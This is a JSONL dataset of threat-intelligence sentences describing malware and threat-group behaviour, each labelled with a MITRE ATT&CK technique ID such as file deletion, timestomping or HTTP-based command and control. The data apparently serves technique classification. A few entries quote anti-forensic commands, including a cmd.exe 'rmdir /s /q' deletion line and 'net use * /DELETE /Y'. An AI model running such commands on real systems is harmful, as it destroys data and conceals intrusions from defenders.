{"text1":"HermeticWiper has the ability to overwrite its own file with random bites.","labels":"['T1070.004']"}
{"text1":"Hi-Zor deletes its RAT installer file as it executes its DLL payload file.","labels":"['T1070.004']"}
{"text1":"Hildegard has deleted scripts after execution.","labels":"['T1070.004']"}
{"text1":"HotCroissant has the ability to clean up installed files, delete files, and delete itself from the victim\u2019s machine.","labels":"['T1070.004']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can delete files.","labels":"['T1070.004']"}
{"text1":"HyperBro has the ability to delete a specified file.","labels":"['T1070.004']"}
{"text1":"IceApple can delete files and directories from targeted systems.","labels":"['T1070.004']"}
{"text1":"Imminent Monitor has deleted files related to its dynamic debugger feature.","labels":"['T1070.004']"}
{"text1":"InnaputRAT has a command to delete files.","labels":"['T1070.004']"}
{"text1":"InvisiMole has deleted files and directories including XML and files successfully uploaded to C2 servers.","labels":"['T1070.004']"}
{"text1":"Ixeshe has a command to delete a file from the machine.","labels":"['T1070.004']"}
{"text1":"JPIN's installer\/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.","labels":"['T1070.004']"}
{"text1":"KONNI can delete files.","labels":"['T1070.004']"}
{"text1":"Kevin can delete files created on the victim's machine.","labels":"['T1070.004']"}
{"text1":"KillDisk has the ability to quit and delete itself.","labels":"['T1070.004']"}
{"text1":"Kimsuky has deleted the exfiltrated data on disk after transmission. Kimsuky has also used an instrumentor script to terminate browser processes running on an infected system and then delete the cookie files on disk.","labels":"['T1070.004']"}
{"text1":"LightNeuron has a function to delete files.","labels":"['T1070.004']"}
{"text1":"Linfo creates a backdoor through which remote attackers can delete files.","labels":"['T1070.004']"}
{"text1":"LiteDuke can securely delete files by first writing random data to the file.","labels":"['T1070.004']"}
{"text1":"LockerGoga has been observed deleting its original launcher after execution.","labels":"['T1070.004']"}
{"text1":"LookBack removes itself after execution and can delete files on the system.","labels":"['T1070.004']"}
{"text1":"MURKYTOP has the capability to delete local files.","labels":"['T1070.004']"}
{"text1":"MacMa can delete itself from the compromised computer.","labels":"['T1070.004']"}
{"text1":"MacSpy deletes any temporary files it creates","labels":"['T1070.004']"}
{"text1":"Metamorfo has deleted itself from the system after execution.","labels":"['T1070.004']"}
{"text1":"Meteor will delete the folder containing malicious scripts if it detects the hostname as `PIS-APP`, `PIS-MOB`, `WSUSPROXY`, or `PIS-DB`.","labels":"['T1070.004']"}
{"text1":"Milan can delete files via `C:\\Windows\\system32\\cmd.exe \/c ping 1.1.1.1 -n 1 -w 3000 > Nul & rmdir \/s \/q`.","labels":"['T1070.004']"}
{"text1":"Misdat is capable of deleting the backdoor file.","labels":"['T1070.004']"}
{"text1":"MoonWind can delete itself or specified files.","labels":"['T1070.004']"}
{"text1":"Mosquito deletes files using DeleteFileW API call.","labels":"['T1070.004']"}
{"text1":"Mustang Panda will delete their tools and files, and kill processes after their objectives are reached.","labels":"['T1070.004']"}
{"text1":"NOKKI can delete files to cover tracks.","labels":"['T1070.004']"}
{"text1":"Nebulae has the ability to delete files and directories.","labels":"['T1070.004']"}
{"text1":"OSX_OCEANLOTUS.D has a command to delete a file from the system. OSX_OCEANLOTUS.D deletes the app bundle and dropper after execution.","labels":"['T1070.004']"}
{"text1":"OceanSalt can delete files from the system.","labels":"['T1070.004']"}
{"text1":"OilRig has deleted files associated with their payload after execution.","labels":"['T1070.004']"}
{"text1":"Okrum's backdoor deletes files after they have been successfully uploaded to C2 servers.","labels":"['T1070.004']"}
{"text1":"Once a file is uploaded, Machete will delete it from the machine.","labels":"['T1070.004']"}
{"text1":"OutSteel can delete itself following the successful execution of a follow-on payload.","labels":"['T1070.004']"}
{"text1":"P.A.S. Webshell can delete scripts from a subdirectory of \/tmp after they are run.","labels":"['T1070.004']"}
{"text1":"PLEAD has the ability to delete files on the compromised host.","labels":"['T1070.004']"}
{"text1":"PUNCHBUGGY can delete files written to disk.","labels":"['T1070.004']"}
{"text1":"Pasam creates a backdoor through which remote attackers can delete files.","labels":"['T1070.004']"}
{"text1":"Pay2Key can remove its log file from disk.","labels":"['T1070.004']"}
{"text1":"PcShare has deleted its files and components from a compromised host.","labels":"['T1070.004']"}
{"text1":"Penquin can delete downloaded executables after running them.","labels":"['T1070.004']"}
{"text1":"PoetRAT has the ability to overwrite scripts and delete itself if a sandbox environment is detected.","labels":"['T1070.004']"}
{"text1":"Pony has used scripts to delete itself after execution.","labels":"['T1070.004']"}
{"text1":"ProLock can remove files containing its payload after they are executed.","labels":"['T1070.004']"}
{"text1":"Pteranodon can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.","labels":"['T1070.004']"}
{"text1":"PyDCrypt will remove all created artifacts such as dropped executables.","labels":"['T1070.004']"}
{"text1":"Pysa has deleted batch files after execution.","labels":"['T1070.004']"}
{"text1":"QUADAGENT has a command to delete its Registry key and scheduled task.","labels":"['T1070.004']"}
{"text1":"QakBot can delete folders and files including overwriting its executable with legitimate programs.","labels":"['T1070.004']"}
{"text1":"RCSession can remove files from a targeted system.","labels":"['T1070.004']"}
{"text1":"RDAT can issue SOAP requests to delete already processed C2 emails. RDAT can also delete itself from the infected system.","labels":"['T1070.004']"}
{"text1":"RDFSNIFFER has the capability of deleting local files.","labels":"['T1070.004']"}
{"text1":"REvil can mark its binary code for deletion after reboot.","labels":"['T1070.004']"}
{"text1":"ROKRAT can request to delete files.","labels":"['T1070.004']"}
{"text1":"RTM can delete all files created during its execution.","labels":"['T1070.004']"}
{"text1":"RainyDay has the ability to uninstall itself by deleting its service and files.","labels":"['T1070.004']"}
{"text1":"Reaver deletes the original dropped file from the victim.","labels":"['T1070.004']"}
{"text1":"Recent versions of Cherry Picker delete files and registry keys created by the malware.","labels":"['T1070.004']"}
{"text1":"RedLeaves can delete specified files.","labels":"['T1070.004']"}
{"text1":"Rising Sun can delete files and artifacts it creates.","labels":"['T1070.004']"}
{"text1":"Rocke has deleted files on infected machines.","labels":"['T1070.004']"}
{"text1":"RunningRAT contains code to delete files from the victim\u2019s machine.","labels":"['T1070.004']"}
{"text1":"S-Type has deleted files it has created on a compromised host.","labels":"['T1070.004']"}
{"text1":"SDBbot has the ability to delete files from a compromised host.","labels":"['T1070.004']"}
{"text1":"SILENTTRINITY can remove files from the compromised host.","labels":"['T1070.004']"}
{"text1":"SLOTHFULMEDIA has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.","labels":"['T1070.004']"}
{"text1":"SQLRat has used been observed deleting scripts once used.","labels":"['T1070.004']"}
{"text1":"Saint Bot can run a batch script named `del.bat` to remove any Saint Bot payload-linked files from a compromise system if anti-analysis or locale checks fail.","labels":"['T1070.004']"}
{"text1":"SamSam has been seen deleting its own files and payloads to make analysis of the attack more difficult.","labels":"['T1070.004']"}
{"text1":"Sandworm Team has used backdoors that can delete files used in an attack from an infected system.","labels":"['T1070.004']"}
{"text1":"SeaDuke can securely delete files, including deleting itself from the victim.","labels":"['T1070.004']"}
{"text1":"Seasalt has a command to delete a specified file.","labels":"['T1070.004']"}
{"text1":"ServHelper has a module to delete itself from the infected machine.","labels":"['T1070.004']"}
{"text1":"Shark can delete files downloaded to the compromised host.","labels":"['T1070.004']"}
{"text1":"ShimRat can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.","labels":"['T1070.004']"}
{"text1":"Silence has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs.","labels":"['T1070.004']"}
{"text1":"SombRAT has the ability to run \"cancel\" or \"closeanddeletestorage\" to remove all files from storage and delete the storage temp file on a compromised host.","labels":"['T1070.004']"}
{"text1":"Some Sakula samples use cmd.exe to delete temporary files.","labels":"['T1070.004']"}
{"text1":"SpeakUp deletes files to remove evidence on the machine.","labels":"['T1070.004']"}
{"text1":"StoneDrill has been observed deleting the temporary files once they fulfill their task.","labels":"['T1070.004']"}
{"text1":"StrifeWater can self delete to cover its tracks.","labels":"['T1070.004']"}
{"text1":"Stuxnet uses an RPC server that contains a routine for file deletion and also removes itself from the system through a DLL export by deleting specific files.","labels":"['T1070.004']"}
{"text1":"SysUpdate can delete its configuration file from the targeted system.","labels":"['T1070.004']"}
{"text1":"TAINTEDSCRIBE can delete files from a compromised host.","labels":"['T1070.004']"}
{"text1":"TDTESS creates then deletes log files during installation of itself as a service.","labels":"['T1070.004']"}
{"text1":"TEMP.Veles routinely deleted tools, logs, and other files after they were finished with them.","labels":"['T1070.004']"}
{"text1":"Taidoor can use \"DeleteFileA\" to remove files from infected hosts.","labels":"['T1070.004']"}
{"text1":"TeamTNT has used a payload that removes itself after running. TeamTNT also has deleted locally staged files for collecting credentials or scan results for local IP addresses after exfiltrating them.","labels":"['T1070.004']"}
{"text1":"The BRONZE BUTLER uploader or malware the uploader uses \"command\" to delete the RAR archives after they have been exfiltrated.","labels":"['T1070.004']"}
{"text1":"The JHUHUGIT dropper can delete itself from the victim. Another JHUHUGIT variant has the capability to delete specified files.","labels":"['T1070.004']"}
{"text1":"The Komplex trojan supports file deletion.","labels":"['T1070.004']"}
{"text1":"Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim.","labels":"['T1070.004']"}
{"text1":"Trojan.Karagany has used plugins with a self-delete capability.","labels":"['T1070.004']"}
{"text1":"Tropic Trooper has deleted dropper files on an infected system using command scripts.","labels":"['T1070.004']"}
{"text1":"UNC2452 routinely removed their tools, including custom backdoors, once remote access was achieved.","labels":"['T1070.004']"}
{"text1":"Ursnif has deleted data staged in tmp files after exfiltration.","labels":"['T1070.004']"}
{"text1":"VBShower has attempted to complicate forensic analysis by deleting all the files contained in \"%APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".","labels":"['T1070.004']"}
{"text1":"VERMIN can delete files on the victim\u2019s machine.","labels":"['T1070.004']"}
{"text1":"Volgmer can delete files and itself after infection to avoid analysis.","labels":"['T1070.004']"}
{"text1":"Wingbird deletes its payload along with the payload's parent process after it finishes copying files.","labels":"['T1070.004']"}
{"text1":"Winnti for Windows can delete the DLLs for its various components from a compromised host.","labels":"['T1070.004']"}
{"text1":"Wizard Spider has used file deletion to remove some modules and configurations from an infected host after use.","labels":"['T1070.004']"}
{"text1":"XAgentOSX contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.","labels":"['T1070.004']"}
{"text1":"Zebrocy has a command to delete files and directories.","labels":"['T1070.004']"}
{"text1":"Zeus Panda has a command to delete a file. It also can uninstall scripts and delete files to cover its track.","labels":"['T1070.004']"}
{"text1":"ZxShell can delete files from the system.","labels":"['T1070.004']"}
{"text1":"ccf32 can delete files and folders from compromised machines.","labels":"['T1070.004']"}
{"text1":"cmd can be used to delete files from the file system.","labels":"['T1070.004']"}
{"text1":"gh0st RAT has the capability to to delete files.","labels":"['T1070.004']"}
{"text1":"pngdowner deletes content from C2 communications that was saved to the user's temporary directory.","labels":"['T1070.004']"}
{"text1":"zwShell has deleted itself after creating a service as well as deleted a temporary file when the system reboots.","labels":"['T1070.004']"}
{"text1":"InvisiMole can disconnect previously connected remote drives.","labels":"['T1070.005']"}
{"text1":"RobbinHood disconnects all network shares from the computer with the command \"net use * \/DELETE \/Y\".","labels":"['T1070.005']"}
{"text1":"The \"net use \\\\system\\share \/delete\" command can be used in Net to remove an established connection to a network share.","labels":"['T1070.005']"}
{"text1":"Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection.","labels":"['T1070.005']"}
{"text1":"3PARA RAT has a command to set certain attributes such as creation\/modification timestamps on files.","labels":"['T1070.006']"}
{"text1":"APT29 modified timestamps of backdoors to match legitimate Windows files.","labels":"['T1070.006']"}
{"text1":"APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, APT32 has used a random value to modify the timestamp of the file storing the clientID.","labels":"['T1070.006']"}
{"text1":"APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.","labels":"['T1070.006']"}
{"text1":"After creating a new service for persistence, TDTESS sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.","labels":"['T1070.006']"}
{"text1":"Attor has manipulated the time of last access to files and registry keys after they have been created or modified.","labels":"['T1070.006']"}
{"text1":"BLINDINGCAN has modified file and directory timestamps.","labels":"['T1070.006']"}
{"text1":"Bankshot modifies the time of a file as specified by the control server.","labels":"['T1070.006']"}
{"text1":"BitPaymer can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.","labels":"['T1070.006']"}
{"text1":"China Chopper's server component can change the timestamp of files.","labels":"['T1070.006']"}
{"text1":"Cobalt Strike can timestomp any files or payloads placed on a target machine to help them blend in.","labels":"['T1070.006']"}
{"text1":"Cobalt Strike will timestomp any files or payloads placed on a target machine to help them blend in.","labels":"['T1070.006']"}
{"text1":"Cyclops Blink has the ability to use the Linux API function `utime` to change the timestamps of modified firmware update images.","labels":"['T1070.006']"}
{"text1":"EVILNUM has changed the creation date of files.","labels":"['T1070.006']"}
{"text1":"Elise performs timestomping of a CAB file it creates.","labels":"['T1070.006']"}
{"text1":"Empire can timestomp any files or payloads placed on a target machine to help them blend in.","labels":"['T1070.006']"}
{"text1":"FALLCHILL can modify file or directory timestamps.","labels":"['T1070.006']"}
{"text1":"For early Gazer versions, the compilation timestamp was faked.","labels":"['T1070.006']"}
{"text1":"Gelsemium has the ability to perform timestomping of files on targeted systems.","labels":"['T1070.006']"}
{"text1":"InvisiMole samples were timestomped by the authors by setting the PE timestamps to all zero values. InvisiMole also has a built-in command to modify file times.","labels":"['T1070.006']"}
{"text1":"Kimsuky has manipulated timestamps for creation or compilation dates to defeat anti-forensics.","labels":"['T1070.006']"}
{"text1":"Kobalos can modify timestamps of replaced files, such as \"ssh\" with the added credential stealer or \"sshd\" used to deploy Kobalos.","labels":"['T1070.006']"}
{"text1":"MacMa has the capability to create and modify file timestamps.","labels":"['T1070.006']"}
{"text1":"Many Misdat samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.","labels":"['T1070.006']"}
{"text1":"OSX_OCEANLOTUS.D can use the \"touch -t\" command to change timestamps.","labels":"['T1070.006']"}
{"text1":"OwaAuth has a command to timestop a file or directory.","labels":"['T1070.006']"}
{"text1":"POSHSPY modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.","labels":"['T1070.006']"}
{"text1":"PowerStallion modifies the MAC times of its local log files to match that of the victim's desktop.ini file.","labels":"['T1070.006']"}
{"text1":"Psylo has a command to conduct timestomping by setting a specified file\u2019s timestamps to match those of a system file in the System32 directory.","labels":"['T1070.006']"}
{"text1":"Rocke has changed the time stamp of certain files.","labels":"['T1070.006']"}
{"text1":"SEASHARPEE can timestomp files on victims using a Web shell.","labels":"['T1070.006']"}
{"text1":"Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.","labels":"['T1070.006']"}
{"text1":"Stuxnet extracts and writes driver files that match the times of other legitimate files.","labels":"['T1070.006']"}
{"text1":"TAINTEDSCRIBE can change the timestamp of specified filenames.","labels":"['T1070.006']"}
{"text1":"TEMP.Veles used timestomping to modify the $STANDARD_INFORMATION attribute on tools.","labels":"['T1070.006']"}
{"text1":"The Derusbi malware supports timestomping.","labels":"['T1070.006']"}
{"text1":"UNC2452 modified timestamps of backdoors to match legitimate Windows files.","labels":"['T1070.006']"}
{"text1":"Winnti for Windows can set the timestamps for its worker and service components to match that of cmd.exe.","labels":"['T1070.006']"}
{"text1":"APT29 removed evidence of email export requests using \"Remove-MailboxExportRequest\".","labels":"['T1070.008']"}
{"text1":"MCMD has the ability to remove set Registry Keys, including those used for persistence.","labels":"['T1070.009']"}
{"text1":"RTM has the ability to remove Registry entries that it created for persistence.","labels":"['T1070.009']"}
{"text1":"SUNBURST removed IFEO registry values to clean up traces of persistence.","labels":"['T1070.009']"}
{"text1":"njRAT is capable of manipulating and deleting registry keys, including those used for persistence.","labels":"['T1070.009']"}
{"text1":"APT34 malware often uses HTTP and DNS for C2. The group has also used the Plink utility and other tools to create tunnels to C2 servers.","labels":"['T1071']"}
{"text1":"Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP\/7519.","labels":"['T1071']"}
{"text1":"Cobalt Strike conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.","labels":"['T1071']"}
{"text1":"Dragonfly has used SMB for C2.","labels":"['T1071']"}
{"text1":"Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.","labels":"['T1071', 'T1572']"}
{"text1":"Exaramel uses HTTPS for C2 communications.","labels":"['T1071']"}
{"text1":"Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.","labels":"['T1071']"}
{"text1":"Magic Hound malware has used IRC for C2.","labels":"['T1071']"}
{"text1":"Siloscape connects to an IRC server for C2.","labels":"['T1071']"}
{"text1":"The Regin malware platform supports many standard protocols, including SMB.","labels":"['T1071']"}
{"text1":"4H RAT uses HTTP for command and control.","labels":"['T1071.001']"}
{"text1":"A SUGARDUMP variant has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"ABK has the ability to use HTTP in communications with C2.","labels":"['T1071.001']"}
{"text1":"ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.","labels":"['T1071.001']"}
{"text1":"APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.","labels":"['T1071.001']"}
{"text1":"APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.","labels":"['T1071.001']"}
{"text1":"APT29 has used HTTP for C2 and data exfiltration.","labels":"['T1071.001']"}
{"text1":"APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.","labels":"['T1071.001']"}
{"text1":"APT33 has used HTTP for command and control.","labels":"['T1071.001']"}
{"text1":"APT37 uses HTTPS to conceal C2 communications.","labels":"['T1071.001']"}
{"text1":"APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.","labels":"['T1071.001']"}
{"text1":"APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.","labels":"['T1071.001']"}
{"text1":"Action RAT can use HTTP to communicate with C2 servers.","labels":"['T1071.001']"}
{"text1":"Agent Tesla has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"Amadey has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"Anchor has used HTTP and HTTPS in C2 communications.","labels":"['T1071.001']"}
{"text1":"AppleJeus has sent data to its C2 server via \"POST\" requests.","labels":"['T1071.001']"}
{"text1":"AppleSeed has the ability to communicate with C2 over HTTP.","labels":"['T1071.001']"}
{"text1":"AuTo Stealer can use HTTP to communicate with its C2 servers.","labels":"['T1071.001']"}
{"text1":"Avenger has the ability to use HTTP in communication with C2.","labels":"['T1071.001']"}
{"text1":"BACKSPACE uses HTTP as a transport to communicate with its command server.","labels":"['T1071.001']"}
{"text1":"BADNEWS establishes a backdoor over HTTP.","labels":"['T1071.001']"}
{"text1":"BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.","labels":"['T1071.001']"}
{"text1":"BLINDINGCAN has used HTTPS over port 443 for command and control.","labels":"['T1071.001']"}
{"text1":"BRONZE BUTLER malware has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"BUBBLEWRAP can communicate using HTTP or HTTPS.","labels":"['T1071.001']"}
{"text1":"BackConfig has the ability to use HTTPS for C2 communiations.","labels":"['T1071.001']"}
{"text1":"BadPatch uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.","labels":"['T1071.001']"}
{"text1":"Bisonal has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"BlackEnergy communicates with its C2 server over HTTP.","labels":"['T1071.001']"}
{"text1":"BlackMould can send commands to C2 in the body of HTTP POST requests.","labels":"['T1071.001']"}
{"text1":"BoomBox has used HTTP POST requests for C2.","labels":"['T1071.001']"}
{"text1":"Bundlore uses HTTP requests for C2.","labels":"['T1071.001']"}
{"text1":"CORESHELL can communicate over HTTP for C2.","labels":"['T1071.001']"}
{"text1":"CSPY Downloader can use GET requests to download additional payloads from C2.","labels":"['T1071.001']"}
{"text1":"Carberp has connected to C2 servers via HTTP.","labels":"['T1071.001']"}
{"text1":"Carbon can use HTTP in C2 communications.","labels":"['T1071.001']"}
{"text1":"ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.","labels":"['T1071.001']"}
{"text1":"Chaes has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"Chimera has used HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"Clambling has the ability to communicate over HTTP.","labels":"['T1071.001']"}
{"text1":"Cobalt Group has used HTTPS for C2.","labels":"['T1071.001']"}
{"text1":"Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.","labels":"['T1071.001']"}
{"text1":"CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.","labels":"['T1071.001']"}
{"text1":"CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.","labels":"['T1071.001']"}
{"text1":"CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.","labels":"['T1071.001']"}
{"text1":"CreepySnail can use HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Crutch has conducted C2 communications with a Dropbox account using the HTTP API.","labels":"['T1071.001']"}
{"text1":"Cyclops Blink can download files via HTTP and HTTPS.","labels":"['T1071.001']"}
{"text1":"DRATzarus can use HTTP or HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"Dacls can use HTTPS in C2 communications.","labels":"['T1071.001']"}
{"text1":"DanBot can use HTTP in C2 communication.","labels":"['T1071.001']"}
{"text1":"Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string \u201c&&&\u201d.","labels":"['T1071.001']"}
{"text1":"DarkWatchman uses HTTPS for command and control.","labels":"['T1071.001']"}
{"text1":"Daserf uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"DealersChoice uses HTTP for communication with the C2 server.","labels":"['T1071.001']"}
{"text1":"Diavol has used HTTP GET and POST requests for C2.","labels":"['T1071.001']"}
{"text1":"Dipsind uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Doki has communicated with C2 over HTTPS.","labels":"['T1071.001']"}
{"text1":"Donut can use HTTP to download previously staged shellcode payloads.","labels":"['T1071.001']"}
{"text1":"DownPaper communicates to its C2 server over HTTP.","labels":"['T1071.001']"}
{"text1":"Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.","labels":"['T1071.001']"}
{"text1":"During Frankenstein, the threat actors used HTTP GET requests for C2.","labels":"['T1071.001']"}
{"text1":"During Night Dragon, threat actors used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.","labels":"['T1071.001']"}
{"text1":"DustySky has used both HTTP and HTTPS for C2.","labels":"['T1071.001']"}
{"text1":"Dyre uses HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"ELMER uses HTTP for command and control.","labels":"['T1071.001']"}
{"text1":"Egregor has communicated with its C2 servers via HTTPS protocol.","labels":"['T1071.001']"}
{"text1":"Emissary uses HTTP or HTTPS for C2.","labels":"['T1071.001']"}
{"text1":"EvilBunny has executed C2 commands directly via HTTP.","labels":"['T1071.001']"}
{"text1":"Exaramel for Linux uses HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.","labels":"['T1071.001']"}
{"text1":"FIN4 has used HTTP POST requests to transmit data.","labels":"['T1071.001']"}
{"text1":"FIN8 has used HTTPS for command and control.","labels":"['T1071.001']"}
{"text1":"FatDuke can be controlled via a custom C2 protocol over HTTP.","labels":"['T1071.001']"}
{"text1":"Felismus uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Final1stspy uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Flagpro can communicate with its C2 using HTTP.","labels":"['T1071.001']"}
{"text1":"Gamaredon Group has used HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"Gazer communicates with its C2 servers over HTTP.","labels":"['T1071.001']"}
{"text1":"Gelsemium can use HTTP\/S in C2 communications.","labels":"['T1071.001']"}
{"text1":"GeminiDuke uses HTTP and HTTPS for command and control.","labels":"['T1071.001']"}
{"text1":"Get2 has the ability to use HTTP to send information collected from an infected host to C2.","labels":"['T1071.001']"}
{"text1":"Gold Dragon uses HTTP for communication to the control servers.","labels":"['T1071.001']"}
{"text1":"GoldFinder has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.","labels":"['T1071.001']"}
{"text1":"GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.","labels":"['T1071.001']"}
{"text1":"Goopy has the ability to communicate with its C2 over HTTP.","labels":"['T1071.001']"}
{"text1":"Grandoreiro has the ability to use HTTP in C2 communications.","labels":"['T1071.001']"}
{"text1":"GravityRAT uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"GreyEnergy uses HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"HAFNIUM has used open-source C2 frameworks, including Covenant.","labels":"['T1071.001']"}
{"text1":"HTTPBrowser has used HTTP and HTTPS for command and control.","labels":"['T1071.001']"}
{"text1":"Helminth can use HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Hikit has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"HyperBro has used HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"IceApple can use HTTP GET to request and pull information from C2.","labels":"['T1071.001']"}
{"text1":"IcedID has used HTTPS in communications with C2.","labels":"['T1071.001']"}
{"text1":"Inception has used HTTP, HTTPS, and WebDav in network communications.","labels":"['T1071.001']"}
{"text1":"InvisiMole uses HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"Ixeshe uses HTTP for command and control.","labels":"['T1071.001']"}
{"text1":"JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.","labels":"['T1071.001']"}
{"text1":"KONNI has used HTTP POST for C2.","labels":"['T1071.001']"}
{"text1":"Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.","labels":"['T1071.001']"}
{"text1":"Keydnap uses HTTPS for command and control.","labels":"['T1071.001']"}
{"text1":"Kinsing has communicated with C2 over HTTP.","labels":"['T1071.001']"}
{"text1":"Koadic has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"LOWBALL command and control occurs via HTTPS over port 443.","labels":"['T1071.001']"}
{"text1":"Lazarus Group has conducted C2 over HTTP and HTTPS.","labels":"['T1071.001']"}
{"text1":"LiteDuke can use HTTP GET requests in C2 communications.","labels":"['T1071.001']"}
{"text1":"Lokibot has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"LookBack\u2019s C2 proxy tool sends data to a C2 server over HTTP.","labels":"['T1071.001']"}
{"text1":"MCMD can use HTTPS in communication with C2 web servers.","labels":"['T1071.001']"}
{"text1":"MacSpy uses HTTP for command and control.","labels":"['T1071.001']"}
{"text1":"Machete malware used Python\u2019s urllib library to make HTTP requests to the C2 server.","labels":"['T1071.001']"}
{"text1":"Machete uses HTTP for Command & Control.","labels":"['T1071.001']"}
{"text1":"Magic Hound malware has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Maze has communicated to hard-coded IP addresses via HTTP.","labels":"['T1071.001']"}
{"text1":"MechaFlounder has the ability to use HTTP in communication with C2.","labels":"['T1071.001']"}
{"text1":"Metamorfo has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Micropsia uses HTTP and HTTPS for C2 network communications.","labels":"['T1071.001']"}
{"text1":"Milan can use HTTPS for communication with C2.","labels":"['T1071.001']"}
{"text1":"MiniDuke uses HTTP and HTTPS for command and control.","labels":"['T1071.001']"}
{"text1":"Mis-Type network traffic can communicate over HTTP.","labels":"['T1071.001']"}
{"text1":"Mongall can use HTTP for C2 communication.","labels":"['T1071.001']"}
{"text1":"More_eggs uses HTTPS for C2.","labels":"['T1071.001']"}
{"text1":"Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.","labels":"['T1071.001']"}
{"text1":"MuddyWater has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"NETWIRE has the ability to communicate over HTTP.","labels":"['T1071.001']"}
{"text1":"NOKKI has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"Neoichor can use HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"Night Dragon has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"OSX_OCEANLOTUS.D can use HTTP POST and GET requests to send and receive C2 information.","labels":"['T1071.001']"}
{"text1":"Octopus has used HTTP GET and POST requests for C2 communications.","labels":"['T1071.001']"}
{"text1":"OnionDuke uses HTTP and HTTPS for C2.","labels":"['T1071.001']"}
{"text1":"OopsIE uses HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"Orangeworm has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Out1 can use HTTP and HTTPS in communications with remote hosts.","labels":"['T1071.001']"}
{"text1":"OutSteel has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.","labels":"['T1071.001']"}
